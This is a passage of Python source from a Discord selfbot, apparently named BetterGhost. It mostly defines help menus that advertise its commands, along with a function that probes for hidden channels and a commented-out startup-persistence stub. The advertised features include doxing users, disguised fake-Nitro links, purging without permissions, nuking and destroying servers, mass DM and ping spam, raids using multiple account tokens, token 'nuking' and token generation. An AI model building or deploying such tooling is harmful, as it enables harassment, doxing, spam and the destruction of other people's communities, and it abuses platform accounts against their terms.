`{BetterGhost.command_prefix}`**stoprickroll** » Stop sending rick astley lyrics.
`{BetterGhost.command_prefix}`**countdown [number]** » Count down from a number.
`{BetterGhost.command_prefix}`**countup [number]** » Count up from a number.
`{BetterGhost.command_prefix}`**pytoexe [path]** » Convert a PY file to an executable.
""")
embed.set_author(name="Fun Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Fun Commands ]
{BetterGhost.command_prefix}slots » Play the slot machine.
{BetterGhost.command_prefix}yomomma » Random yo momma joke.
{BetterGhost.command_prefix}socialcredit [@user] » A users social credit score.
{BetterGhost.command_prefix}roast [@user] » Roast a user.
{BetterGhost.command_prefix}howgay [@user] » How gay a user is.
{BetterGhost.command_prefix}howskid [@user] » Check the percentage of a skid.
{BetterGhost.command_prefix}iq [@user] » Check how smart a user is.
{BetterGhost.command_prefix}pp [@user] » The length of a user's penis.
{BetterGhost.command_prefix}rainbowrole [@role] » Kill Discord's API with a sexy rainbow role.
{BetterGhost.command_prefix}coinflip » Flip a coin.
{BetterGhost.command_prefix}dice » Roll a dice.
{BetterGhost.command_prefix}8ball [question] » Ask the magic eight ball a question.
{BetterGhost.command_prefix}choice [choice1] [choice2] » Pick a random choice.
{BetterGhost.command_prefix}dox [@user] » Dox the mentioned user.
{BetterGhost.command_prefix}fakenitro [url] » Hide a link in a nitro URL.
{BetterGhost.command_prefix}purgehack » Purge without permissions.
{BetterGhost.command_prefix}dadjoke » A random dad joke.
{BetterGhost.command_prefix}randommessage » A random message.
{BetterGhost.command_prefix}randomquestion » A random question.
{BetterGhost.command_prefix}rickroll » Send never gonna give you up lyrics one by one.
{BetterGhost.command_prefix}stoprickroll » Stop sending rick astley lyrics.
{BetterGhost.command_prefix}countdown [number] » Count down from a number.
{BetterGhost.command_prefix}countup [number] » Count up from a number.
{BetterGhost.command_prefix}pytoexe [path] » Convert a PY file to an executable.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="image", description="Image related commands.", usage="image")
async def image(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**meme** » A random meme.
`{BetterGhost.command_prefix}`**cat** » A random cat image.
`{BetterGhost.command_prefix}`**dog** » A random dog image.
`{BetterGhost.command_prefix}`**shiba** » A random shiba image.
`{BetterGhost.command_prefix}`**fox** » A random fox image. (Thanks Imf44 <3)
`{BetterGhost.command_prefix}`**avatar [@user]** » Get the mentioned user's avatar.
`{BetterGhost.command_prefix}`**servericon** » Get the server's icon.
`{BetterGhost.command_prefix}`**achievement ["text"] (icon)** » Create a fake minecraft achievement image.
`{BetterGhost.command_prefix}`**challenge ["text"] (icon)** » Create a fake minecraft challenge image.
`{BetterGhost.command_prefix}`**captcha [text]** » Create a fake reCaptcha.
`{BetterGhost.command_prefix}`**amiajoke [@user]** » Make a user a joke.
`{BetterGhost.command_prefix}`**didyoumean ["text 1"] ["text 2"]** » Create a google did you mean image.
`{BetterGhost.command_prefix}`**drake ["text 1"] ["text 2"]** » Create a drake meme image.
`{BetterGhost.command_prefix}`**facts [text]** » Create a facts meme image.
`{BetterGhost.command_prefix}`**jokeoverhead [image url]** » Create a joke over head image.
`{BetterGhost.command_prefix}`**pornhub ["text 1"] ["text 2"]** » Create a pornhub logo image.
`{BetterGhost.command_prefix}`**salty [@user]** » Make someone salty.
`{BetterGhost.command_prefix}`**ship [@user 1] [@user 2]** » Ship two people.
`{BetterGhost.command_prefix}`**supreme [text]** » Create a supreme logo image.
`{BetterGhost.command_prefix}`**trash [@user]** » Put someone in the trash.
`{BetterGhost.command_prefix}`**what [image url]** » Make a what meme.
""")
embed.set_author(name="Image Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Image Commands ]
{BetterGhost.command_prefix}meme » A random meme.
{BetterGhost.command_prefix}cat » A random cat image.
{BetterGhost.command_prefix}dog » A random dog image.
{BetterGhost.command_prefix}shiba » A random shiba image.
{BetterGhost.command_prefix}fox » A random fox image. (Thanks Imf44 <3)
{BetterGhost.command_prefix}avatar [@user] » Get the mentioned user's avatar.
{BetterGhost.command_prefix}servericon » Get the server's icon.
{BetterGhost.command_prefix}achievement ["text"] (icon) » Create a fake minecraft achievement image.
{BetterGhost.command_prefix}challenge ["text"] (icon) » Create a fake minecraft challenge image.
{BetterGhost.command_prefix}captcha [text] » Create a fake reCaptcha.
{BetterGhost.command_prefix}amiajoke [@user] » Make a user a joke.
{BetterGhost.command_prefix}didyoumean ["text 1"] ["text 2"] » Create a google did you mean image.
{BetterGhost.command_prefix}drake ["text 1"] ["text 2"] » Create a drake meme image.
{BetterGhost.command_prefix}facts [text] » Create a facts meme image.
{BetterGhost.command_prefix}jokeoverhead [image url] » Create a joke over head image.
{BetterGhost.command_prefix}pornhub ["text 1"] ["text 2"] » Create a pornhub logo image.
{BetterGhost.command_prefix}salty [@user] » Make someone salty.
{BetterGhost.command_prefix}ship [@user 1] [@user 2] » Ship two people.
{BetterGhost.command_prefix}supreme [text] » Create a supreme logo image.
{BetterGhost.command_prefix}trash [@user] » Put someone in the trash.
{BetterGhost.command_prefix}what [image url] » Make a what meme.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="nsfw", description="NSFW related commands.", usage="nsfw")
async def nsfw(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**boobs** » Pictures or videos of boobs.
`{BetterGhost.command_prefix}`**ass** » Pictures or videos of ass.
`{BetterGhost.command_prefix}`**pussy** » Pictures or videos of pussy.
`{BetterGhost.command_prefix}`**porngif** » Porn gifs.
`{BetterGhost.command_prefix}`**hentai** » Pictures or videos of hentai.
""")
embed.set_author(name="NSFW Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ NSFW Commands ]
{BetterGhost.command_prefix}boobs » Pictures or videos of boobs.
{BetterGhost.command_prefix}ass » Pictures or videos of ass.
{BetterGhost.command_prefix}pussy » Pictures or videos of pussy.
{BetterGhost.command_prefix}porngif » Porn gifs.
{BetterGhost.command_prefix}hentai » Pictures or videos of hentai.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="moderation", description="Moderation related commands.", usage="moderation")
async def moderation(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**ban [@user]** » Ban the mentioned user.
`{BetterGhost.command_prefix}`**unban [id]** » Unban the mentioned id.
`{BetterGhost.command_prefix}`**banlist** » See the server's ban list.
`{BetterGhost.command_prefix}`**kick [@user]** » Kick the mentioned user.
`{BetterGhost.command_prefix}`**mute [@user]** » Mute the menitioned user.
`{BetterGhost.command_prefix}`**unmute [@user]** » Unmute the mentioned user.
`{BetterGhost.command_prefix}`**newrole [name]** » Create a new role.
`{BetterGhost.command_prefix}`**delrole [@role]** » Delete the mentioned role.
`{BetterGhost.command_prefix}`**purge [amount]** » Purge X amount of messages.
`{BetterGhost.command_prefix}`**lock** » Lock the command channel.
`{BetterGhost.command_prefix}`**unlock** » Unlock the command channel.
`{BetterGhost.command_prefix}`**lockdown** » Lock the entire server.
`{BetterGhost.command_prefix}`**unlockdown** » Unlock the entire server.
`{BetterGhost.command_prefix}`**spacechannel [channel name]** » Create a channel with spaces.
""")
embed.set_author(name="Moderation Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Moderation Commands ]
{BetterGhost.command_prefix}ban [@user] » Ban the mentioned user.
{BetterGhost.command_prefix}unban [id] » Unban the mentioned id.
{BetterGhost.command_prefix}banlist » See the server's ban list.
{BetterGhost.command_prefix}kick [@user] » Kick the mentioned user.
{BetterGhost.command_prefix}mute [@user] » Mute the menitioned user.
{BetterGhost.command_prefix}unmute [@user] » Unmute the mentioned user.
{BetterGhost.command_prefix}newrole [name] » Create a new role.
{BetterGhost.command_prefix}delrole [@role] » Delete the mentioned role.
{BetterGhost.command_prefix}purge [amount] » Purge X amount of messages.
{BetterGhost.command_prefix}lock » Lock the command channel.
{BetterGhost.command_prefix}unlock » Unlock the command channel.
{BetterGhost.command_prefix}lockdown » Lock the entire server.
{BetterGhost.command_prefix}unlockdown » Unlock the entire server.
{BetterGhost.command_prefix}spacechannel [channel name] » Create a channel with spaces.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="info", description="Info related commands.", usage="info")
async def info(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**userinfo [@user]** » Information about the mentioned user.
`{BetterGhost.command_prefix}`**serverinfo** » Information about the command server.
`{BetterGhost.command_prefix}`**watchdogstats** » Get stats about Hypixel's Anticheat, Watchdog.
`{BetterGhost.command_prefix}`**getmessage [message id]** » Get a message by ID.
`{BetterGhost.command_prefix}`**geoip [ip]** » Get information from an IP address.
`{BetterGhost.command_prefix}`**ping [ip/domain]** » Ping a domain or ip address.
`{BetterGhost.command_prefix}`**crypto [currency]** » Get the current data on a cryptocurrency.
""")
embed.set_author(name="Info Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Info Commands ]
{BetterGhost.command_prefix}userinfo [@user] » Information about the mentioned user.
{BetterGhost.command_prefix}serverinfo » Information about the command server.
{BetterGhost.command_prefix}watchdogstats » Get stats about Hypixel's Anticheat, Watchdog.
{BetterGhost.command_prefix}getmessage [message id] » Get a message by ID.
{BetterGhost.command_prefix}geoip [ip] » Get information from an IP address.
{BetterGhost.command_prefix}ping [ip/domain] » Ping a domain or ip address.
{BetterGhost.command_prefix}crypto [currency] » Get the current data on a cryptocurrency.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="user", description="User related commands.", usage="user")
async def user(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**purgeself [amount]** » Purge your messages.
`{BetterGhost.command_prefix}`**statuscycle** » Start a custom status cycle.
`{BetterGhost.command_prefix}`**statuscycletext [text]** » Set the text used in status cycle.
`{BetterGhost.command_prefix}`**clearstatus** » Clear your status.
`{BetterGhost.command_prefix}`**nickname [text]** » Set your nickname to anything.
`{BetterGhost.command_prefix}`**clearnickname** » Clear your nickname.
`{BetterGhost.command_prefix}`**ppin [message id]** » Add a message to your personal pins.
`{BetterGhost.command_prefix}`**ppins** » List all your pinned messages.
`{BetterGhost.command_prefix}`**ppindel [pin id]** » Delete a pin from your personal pins.
`{BetterGhost.command_prefix}`**backupfriends** » Backup all your friend's user IDs to a file.
`{BetterGhost.command_prefix}`**backupservers** » Backup all your servers and try to create invites for each one.
`{BetterGhost.command_prefix}`**changehypesquad [bravery/brilliance/balance]** » Change your hypesquad house.
`{BetterGhost.command_prefix}`**stealpfp [@user]** » Set someones avatar as your avatar.
""")
embed.set_author(name="User Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ User Commands ]
{BetterGhost.command_prefix}purgeself [amount] » Purge your messages.
{BetterGhost.command_prefix}statuscycle » Start a custom status cycle.
{BetterGhost.command_prefix}statuscycletext [text] » Set the text used in status cycle.
{BetterGhost.command_prefix}clearstatus » Clear your status.
{BetterGhost.command_prefix}nickname [text] » Set your nickname to anything.
{BetterGhost.command_prefix}clearnickname » Clear your nickname.
{BetterGhost.command_prefix}ppin [message id] » Add a message to your personal pins.
{BetterGhost.command_prefix}ppins » List all your pinned messages.
{BetterGhost.command_prefix}ppindel [pin id] » Delete a pin from your personal pins.
{BetterGhost.command_prefix}backupfriends » Backup all your friend's user IDs to a file.
{BetterGhost.command_prefix}backupservers » Backup all your servers and try to create invites for each one.
{BetterGhost.command_prefix}changehypesquad [bravery/brilliance/balance] » Change your hypesquad house.
{BetterGhost.command_prefix}stealpfp [@user] » Set someones avatar as your avatar.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="selfbot", description="Selfbot related commands.", usage="selfbot")
async def selfbot(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**afkmode** » Toggle afk mode.
`{BetterGhost.command_prefix}`**settings** » The bot's settings.
`{BetterGhost.command_prefix}`**restart** » Restart BetterGhost selfbot.
`{BetterGhost.command_prefix}`**prefix [prefix]** » Set the command prefix.
`{BetterGhost.command_prefix}`**dumpchat [amount] (channel id) (oldest first, true/false)** » Get the chat's history.
`{BetterGhost.command_prefix}`**invite** » Get BetterGhost's Discord server invite link.
`{BetterGhost.command_prefix}`**addccmd [name] [response]** » Add a custom command.
`{BetterGhost.command_prefix}`**delccmd [name]** » Delete a custom command.
`{BetterGhost.command_prefix}`**detections** » A list of all detections.
`{BetterGhost.command_prefix}`**snipers** » A list of all snipers.
`{BetterGhost.command_prefix}`**enablesniper [type]** » Enable a sniper.
`{BetterGhost.command_prefix}`**disablesniper [type]** » Disable a sniper.
`{BetterGhost.command_prefix}`**enabledetect [type]** » Enable a detection.
`{BetterGhost.command_prefix}`**disabledetect [type]** » Disable a detection.
`{BetterGhost.command_prefix}`**riskmode** » Disable and enable risk mode.
`{BetterGhost.command_prefix}`**sounds** » Toggle BetterGhost notification sounds.
`{BetterGhost.command_prefix}`**notifications** » Toggle BetterGhost notification.
""")
embed.set_author(name="Selfbot Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Selfbot Commands ]
{BetterGhost.command_prefix}settings » The bot's settings.
{BetterGhost.command_prefix}restart » Restart BetterGhost selfbot.
{BetterGhost.command_prefix}prefix [prefix] » Set the command prefix.
{BetterGhost.command_prefix}dumpchat [amount] (channel id) (oldest first, true/false) » Get the chat's history.
{BetterGhost.command_prefix}invite » Get BetterGhost's Discord server invite link.
{BetterGhost.command_prefix}addccmd [name] [response] » Add a custom command.
{BetterGhost.command_prefix}delccmd [name] » Delete a custom command.
{BetterGhost.command_prefix}detections » A list of all detections.
{BetterGhost.command_prefix}snipers » A list of all snipers.
{BetterGhost.command_prefix}enablesniper [type] » Enable a sniper.
{BetterGhost.command_prefix}disablesniper [type] » Disable a sniper.
{BetterGhost.command_prefix}enabledetect [type] » Enable a detection.
{BetterGhost.command_prefix}disabledetect [type] » Disable a detection.
{BetterGhost.command_prefix}riskmode » Disable and enable risk mode.
{BetterGhost.command_prefix}sounds » Toggle BetterGhost notification sounds.
{BetterGhost.command_prefix}notifications » Toggle BetterGhost notification.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="webhook", description="Webhook related commands.", usage="webhook")
async def webhook(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**delwebhook [id]** » Delete a webhook from the ID.
`{BetterGhost.command_prefix}`**newwebhook [name]** » Create a webhook in the command channel.
`{BetterGhost.command_prefix}`**spamwebhook [amount] [url] (message)** » Spam the shit out of a webhook.
`{BetterGhost.command_prefix}`**webhooksetup** » Creates a new server with webhooks.
`{BetterGhost.command_prefix}`**webhookinfo [id]** » Information about the webhook.
""")
embed.set_author(name="Webhook Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Webhook Commands ]
{BetterGhost.command_prefix}delwebhook [id] » Delete a webhook from the ID.
{BetterGhost.command_prefix}newwebhook [name] » Create a webhook in the command channel.
{BetterGhost.command_prefix}spamwebhook [amount] [url] (message) » Spam the shit out of a webhook.
{BetterGhost.command_prefix}webhooksetup » Creates a new server with webhooks.
{BetterGhost.command_prefix}webhookinfo [id] » Information about the webhook.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="abuse", description="Abuse related commands.", usage="abuse")
async def abuse(ctx, page:int = 1):
if __riskmode__:
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**spam [amount] [delay] [message]** » Spam X amount of times.
`{BetterGhost.command_prefix}`**stopspam** » Stop spamming messages.
`{BetterGhost.command_prefix}`**dmspam [amount] [delay] [@user] [message]** » Spam DM messages X amount of times.
`{BetterGhost.command_prefix}`**channelspam [amount] [delay] [message]** » Spam a message X amount of times in every channel.
`{BetterGhost.command_prefix}`**threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]** » Spam create threads with a starting message.
`{BetterGhost.command_prefix}`**ttsspam [amount] [delay] [message]** » Spam TTS messages X amount of times.
`{BetterGhost.command_prefix}`**reactspam [emoji] [messages]** » Spam reactions on X amount of messages.
`{BetterGhost.command_prefix}`**massghostping [delay] [@user]** » BetterGhost Ping the user in every channel.
`{BetterGhost.command_prefix}`**ghostping [@user]** » Ping a user then delete the message.
`{BetterGhost.command_prefix}`**massping (amount of messages) (send delay)** » Ping a mass amount of people in the command server.
`{BetterGhost.command_prefix}`**massnick [nickname]** » Change the nickname of all members in the command server.
`{BetterGhost.command_prefix}`**massdm [delay] [amount] [message]** » Send a DM message to everyone in the server.
`{BetterGhost.command_prefix}`**nukeserver** » Delete all roles and channels in the command server.
`{BetterGhost.command_prefix}`**destroyserver** » Completely destroy the command server.
`{BetterGhost.command_prefix}`**deletechannels** » Delete all of the command server's channels.
`{BetterGhost.command_prefix}`**deleteroles** » Delete all of the command server's roles.
`{BetterGhost.command_prefix}`**spamchannels [amount] (name)** » Spam create channels with a desired name. (Thanks Port <3)
`{BetterGhost.command_prefix}`**spamroles [amount] (name)** » Spam create roles with a desired name.
`{BetterGhost.command_prefix}`**raidjoin [delay] [invite]** » Make all your account tokens join a server.
`{BetterGhost.command_prefix}`**tokenraid [amount] [channel id] (message)** » Raid a server with all your account tokens.
`{BetterGhost.command_prefix}`**massban** » Ban all the members in the command server.
`{BetterGhost.command_prefix}`**masskick** » Kick all the members in the command server.
""")
embed.set_author(name="Abuse Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
{BetterGhost.command_prefix}spam [amount] [delay] [message] » Spam X amount of times.
{BetterGhost.command_prefix}stopspam » Stop spamming messages.
{BetterGhost.command_prefix}dmspam [amount] [delay] [@user] [message] » Spam DM messages X amount of times.
{BetterGhost.command_prefix}channelspam [amount] [delay] [message] » Spam X amount of times in all channels.
{BetterGhost.command_prefix}threadspam [delay] [amount] [name] [startmessage] » Spam create threads with a starting message.
{BetterGhost.command_prefix}ttsspam [amount] [delay] [message] » Spam TTS messages X amount of times.
{BetterGhost.command_prefix}reactspam [emoji] [messages] » Spam reactions on X amount of messages.
{BetterGhost.command_prefix}massghostping [delay] [@user] » BetterGhost Ping the user in every channel.
{BetterGhost.command_prefix}ghostping [@user] » Ping a user then delete the message.
{BetterGhost.command_prefix}massping » Ping a mass amount of people in the command server.
{BetterGhost.command_prefix}massnick [nickname] » Change the nickname of all members in the command server.
{BetterGhost.command_prefix}massdm [delay] [amount] [message] » Send a DM message to everyone in the server.
{BetterGhost.command_prefix}nukeserver » Delete all roles and channels in the command server.
{BetterGhost.command_prefix}destroyserver » Completely destroy the command server.
{BetterGhost.command_prefix}deletechannels » Delete all of the command server's channels.
{BetterGhost.command_prefix}deleteroles » Delete all of the command server's roles.
{BetterGhost.command_prefix}spamchannels [amount] (name) » Spam create channels with a desired name. (Thanks Port <3)
{BetterGhost.command_prefix}spamroles [amount] (name) » Spam create roles with a desired name.
{BetterGhost.command_prefix}raidjoin [delay] [invite] » Make all your account tokens join a server.
{BetterGhost.command_prefix}tokenraid [amount] [channel id] (message) » Raid a server with all your account tokens.
{BetterGhost.command_prefix}massban » Ban all the members in the command server.
{BetterGhost.command_prefix}masskick » Kick all the members in the command server.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="tools", description="Discord and other tools.", usage="tools")
async def tools(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**tokeninfo [token]** » Information about a token.
`{BetterGhost.command_prefix}`**nuketoken [token]** » Nuke a token.
`{BetterGhost.command_prefix}`**checktoken [token]** » Checks if a token is working.
`{BetterGhost.command_prefix}`**checktokens** » Check your tokens.
`{BetterGhost.command_prefix}`**nitrogen** » Generate a nitro code.
`{BetterGhost.command_prefix}`**tokengen** » Generate a discord user token.
`{BetterGhost.command_prefix}`**identitygen** » Generate a fake identity.
`{BetterGhost.command_prefix}`**passwordgen [length]** » Generate a secure password.
`{BetterGhost.command_prefix}`**ccgen** » Generate a fake Credit card.
""")
embed.set_author(name="Tools (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Tools ]
{BetterGhost.command_prefix}tokeninfo [token] » Information about a token.
{BetterGhost.command_prefix}nuketoken [token] » Nuke a token.
{BetterGhost.command_prefix}checktoken [token] » Checks if a token is working.
{BetterGhost.command_prefix}checktokens » Check your tokens.
{BetterGhost.command_prefix}nitrogen » Generate a nitro code.
{BetterGhost.command_prefix}tokengen » Generate a discord user token.
{BetterGhost.command_prefix}identitygen » Generate a fake identity.
{BetterGhost.command_prefix}passwordgen [length] » Generate a secure password.
{BetterGhost.command_prefix}ccgen » Generate a fake Credit card.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="giveaway", description="Giveaway related commands.", usage="giveaway")
async def giveaway(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**gstart [duration] [winners] [prize]** » Start a giveaway in the same channel
`{BetterGhost.command_prefix}`**gend [message id]** » End a giveaway
`{BetterGhost.command_prefix}`**greroll [message id]** » Re-roll a giveaway
""")
embed.set_author(name="Giveaway Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Giveaway Commands ]
{BetterGhost.command_prefix}gstart [duration] [winners] [prize] » Start a giveaway in the same channel
{BetterGhost.command_prefix}gend [message id] » End a giveaway
{BetterGhost.command_prefix}greroll [message id] » Re-roll a giveaway
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="proxy", description="Proxy related commands.", usage="proxy")
async def proxy(ctx, page:int=1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**proxies http** » Scrape HTTP proxies.
`{BetterGhost.command_prefix}`**proxies https** » Scrape HTTPS proxies.
`{BetterGhost.command_prefix}`**proxies socks4** » Scrape SOCKS4 proxies.
`{BetterGhost.command_prefix}`**proxies socks5** » Scrape SOCKS5 proxies.
`{BetterGhost.command_prefix}`**proxies all** » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
""")
embed.set_author(name="Proxy Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Proxy Commands ]
{BetterGhost.command_prefix}proxies http » Scrape HTTP proxies.
{BetterGhost.command_prefix}proxies https » Scrape HTTPS proxies.
{BetterGhost.command_prefix}proxies socks4 » Scrape SOCKS4 proxies.
{BetterGhost.command_prefix}proxies socks5 » Scrape SOCKS5 proxies.
{BetterGhost.command_prefix}proxies all » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="hiddenchannels", description="Sends a list of all the channels you cant see.", usage="hiddenchannels (guild id)")
async def hiddenchannels(ctx, guild=None):
    """List the channels in a guild that this account cannot access.

    A channel counts as hidden when a direct REST fetch of it with this
    account's token returns a non-200 status.

    Parameters:
        ctx: command invocation context.
        guild: optional guild id (string/int); defaults to the current guild.
    """
    # Fix: compare to None with `is`, not `==` (PEP 8).
    if guild is None:
        guild = ctx.guild
    else:
        guild = await BetterGhost.fetch_guild(int(guild))
    hiddenChannels = []
    message = await ctx.send("Looking for hidden channels, this could take a while...")
    for channel in guild.channels:
        # Categories are containers, not viewable channels; skip them.
        if str(channel.type).lower() != "category":
            # NOTE(review): a blocking requests.get inside an async command
            # stalls the event loop for the whole scan; consider aiohttp or
            # run_in_executor.
            request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
            if request.status_code != 200:
                if __embedmode__:
                    hiddenChannels.append("#"+channel.name)
                else:
                    hiddenChannels.append(channel.name)
                print_info(f"{channel.name} is hidden.")
            else:
                print_info(f"{channel.name} is not hidden.")
            # await asyncio.sleep(1)
    if __embedmode__:
        embed = discord.Embed(title=f"Hidden Channels", description=f"There is a total of `{len(hiddenChannels)}` hidden channels.\n \n```{', '.join(hiddenChannels)}```", color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await message.edit(content="", embed=embed, delete_after=__deletetimeout__)
    else:
        await message.edit(content=f"""```ini
[ Hidden Channels ]
There is a total of {len(hiddenChannels)} hidden channels.
{', '.join(hiddenChannels)}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="clearconsole", description="Clear your console.", usage="clearconsole", aliases=["resetconsole", "consoleclear", "consolereset"])
async def clearconsole(ctx):
    """Clear the terminal and redraw the BetterGhost banner for the configured console mode."""
    # Terminal width is sampled once; most banners centre against this value.
    width = os.get_terminal_size().columns
    if is_windows():
        os.system("cls")
        os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
    # --- commented-out startup-persistence experiment retained from original ---
    # if is_windows():
    #     def startupPath():
    #         return str(shell.SHGetFolderPath(0, (shellcon.CSIDL_STARTUP, shellcon.CSIDL_COMMON_STARTUP)[0], None, 0))
    #     os.system("cls")
    #     os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
    #     if (CONFIG["load_on_startup"] == True):
